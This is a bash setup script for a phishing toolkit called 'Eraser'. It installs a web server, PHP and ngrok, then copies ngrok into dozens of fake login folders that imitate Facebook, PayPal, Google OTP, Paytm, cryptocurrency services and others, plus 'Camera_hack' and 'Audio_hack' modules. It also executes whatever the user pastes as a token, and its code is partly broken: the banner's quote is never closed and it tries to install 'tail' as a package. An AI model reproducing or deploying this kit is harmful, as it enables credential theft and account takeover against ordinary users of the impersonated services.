#!/bin/bash
clear
echo 
echo -e "\e[94m   


███████╗██████╗░░█████╗░░██████╗███████╗██████╗░
██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗
█████╗░░██████╔╝███████║╚█████╗░█████╗░░██████╔╝
██╔══╝░░██╔══██╗██╔══██║░╚═══██╗██╔══╝░░██╔══██╗
███████╗██║░░██║██║░░██║██████╔╝███████╗██║░░██║
╚══════╝╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝V 1.0

echo 
echo -e "\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;32m Installing The Best Phishing Tool Please Wait \e[0m"
echo
sleep 2
echo -e "\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;32m Checking Required Dependencies \e[0m"
sleep 1
sudo apt-get install xterm > /dev/null 2>&1

cyan='\033[0;36m'
green='\033[0;32m'
lightgreen='\e[0;32m'
white='\e[0;37m'
red='\e[0;31m'
yellow='\033[0;33m'
blue='\033[0;34m'
orange='\e[38;5;166m'

dependencies() {
which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
  echo
  sleep 2
  echo -e "$green" "[ ✔ ] apache2......................[ found ]"
else
  echo
  sleep 2
  echo -e "$red" "[ X ] apache2......................[ not found ]"
fi

which php > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
  echo
  sleep 2
  echo -e "$green" "[ ✔ ] php......................[ found ]"
else
  echo
  sleep 2
  echo -e "$red" "[ X ] php......................[ not found ]"
fi

which tail > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
  echo
  sleep 2
  echo -e "$green" "[ ✔ ] tail......................[ found ]"
else
  echo
  sleep 2
  echo -e "$red" "[ X ] tail......................[ not found ]"
fi

which jq > /dev/null 2>&1

if [ "$?" -eq "0" ]; then
  echo
  sleep 2
  echo -e "$green" "[ ✔ ] jq......................[ found ]"
else
  echo
  sleep 2
  echo -e "$red" "[ X ] jq......................[ not found ]"
fi

which curl > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
  echo
  sleep 2
  echo -e "$green" "[ ✔ ] curl......................[ found ]"
else
  echo
  sleep 2
  echo -e "$red" "[ X ] curl......................[ not found ]"
fi

which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
  echo
  sleep 2
  echo -e "$green" "[ ✔ ] xterm......................[ found ]"
else
  echo
  sleep 2
  echo -e "$red" "[ X ] xterm......................[ not found ]"
fi

which wget > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
  echo
  sleep 2
  echo -e "$green" "[ ✔ ] wget......................[ found ]\e[m"
else
  echo
  sleep 2
  echo -e "$red" "[ X ] wget......................[ not found ]\e[m"
fi
echo
}

#dependencies
dependencies
sleep 4

xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get update"
xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get install apache2 -y"
xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get install php -y"
xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get install jq -y"
xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get install tail -y"
xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get install curl -y"
xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get install xterm -y"
xterm -T "Eraser © 2020" -geometry 115x35 -e "sudo apt-get install wget -y"
clear
echo
dependencies
sleep 4

clear
echo
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Instaling ngrok .. \e[m "
echo
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Successfuly installed \e[m "
sleep 3
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Inflating ngrok \e[m "
sleep 4
unzip ngrok-stable-linux-amd64.zip > /dev/null 2>&1
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Done \e[m "
sleep 2
chmod +x ngrok
chmod +x Eraser_logo
cp -R ngrok hps/github/
cp -R Eraser_logo hps/github
cp -R ngrok hps/Hotstar-otp-bypass/
cp -R Eraser_logo hps/Hotstar-otp-bypass
cp -R ngrok hps/instagram/
cp -R Eraser_logo hps/instagram
cp -R ngrok hps/Linkedin/
cp -R Eraser_logo hps/Linkedin
cp -R ngrok hps/Netflix/
cp -R Eraser_logo hps/Netflix
cp -R ngrok hps/Paytm-Phishing/paytm/
cp -R Eraser_logo hps/Paytm-Phishing/paytm
cp -R ngrok hps/Paytm-Phishing/signup/
cp -R Eraser_logo hps/Paytm-Phishing/signup
cp -R ngrok hps/spotify/
cp -R Eraser_logo hps/spotify
cp -R ngrok hps/whatsapp-phishing/
cp -R Eraser_logo hps/whatsapp-phishing
cp -R ngrok hps/facebook/
cp -R Eraser_logo hps/facebook
cp -R ngrok hps/google-otp/
cp -R Eraser_logo hps/google-otp
cp -R ngrok hps/instafollow/
cp -R Eraser_logo hps/instafollow
cp -R ngrok hps/ipfinder/
cp -R Eraser_logo hps/ipfinder
cp -R ngrok hps/ola-otpbypass/
cp -R Eraser_logo hps/ola-otpbypass
cp -R ngrok hps/UberEats-Phishing/
cp -R Eraser_logo hps/UberEats-Phishing
cp -R ngrok hps/Zomato-Phishing/
cp -R Eraser_logo hps/Zomato-Phishing
cp -R ngrok hps/amazonsign/
cp -R Eraser_logo hps/amazonsign
cp -R ngrok hps/phonepay/
cp -R Eraser_logo hps/phonepay
cp -R ngrok hps/paypal/
cp -R Eraser_logo hps/paypal
cp -R ngrok hps/telegram/
cp -R Eraser_logo hps/telegram
cp -R ngrok hps/twitter/
cp -R Eraser_logo hps/twitter
cp -R ngrok hps/flipcart/
cp -R Eraser_logo hps/flipcart
cp -R ngrok hps/wordpress/
cp -R Eraser_logo hps/wordpress
cp -R ngrok hps/snapchat/
cp -R Eraser_logo hps/snapchat
cp -R ngrok hps/protonmail/
cp -R Eraser_logo hps/protonmail
cp -R ngrok hps/stackoverflow/
cp -R Eraser_logo hps/stackoverflow
cp -R ngrok hps/ebay/
cp -R Eraser_logo hps/ebay
cp -R ngrok hps/twitch/
cp -R Eraser_logo hps/twitch
cp -R ngrok hps/ajio/
cp -R Eraser_logo hps/ajio
cp -R ngrok hps/cryptocurrency/
cp -R Eraser_logo hps/cryptocurrency
cp -R ngrok hps/mobikwik/
cp -R Eraser_logo hps/mobikwik
cp -R ngrok hps/pinterest/
cp -R Eraser_logo hps/pinterest
cp -R ngrok hps/Camera_hack
cp -R Eraser_logo hps/Camera_hack
cp -R Eraser_logo hps/Audio_hack
cp -R ngrok hps/Audio_hack


clear
echo 
echo 
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Visit ngrok.com \e[m "
sleep 2
echo " "
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Sign up & get ngrok authtoken \e[m "
sleep 1
echo " "
read -p $'\e[31m[\e[32m*\e[31m]\e[33m Paste Your Ngrok Token [Ex. ./ngrok authtoken ] : \e[0m' token
$token >> /dev/null 2>&1
sleep 1
clear
echo
echo
echo -e "\e[92m[+] Setting up Eraser \e[m "
echo 
rm setup
rm Eraser
mv kali-setup setup 
mv kali-Eraser Eraser
cp -R hps /usr/bin
cp -R Eraser /usr/bin
###########XXXXXXXXXXXXX####################
#     JUST LEARNING KEEP SUPPORTING        #
############XXXXXXXXXXXX####################
echo -e "\e[92m[+] To run the tool from anywhere simply type : Eraser \e[m "
echo 
exit
#####################################
#           THANKYOU                #
#####################################
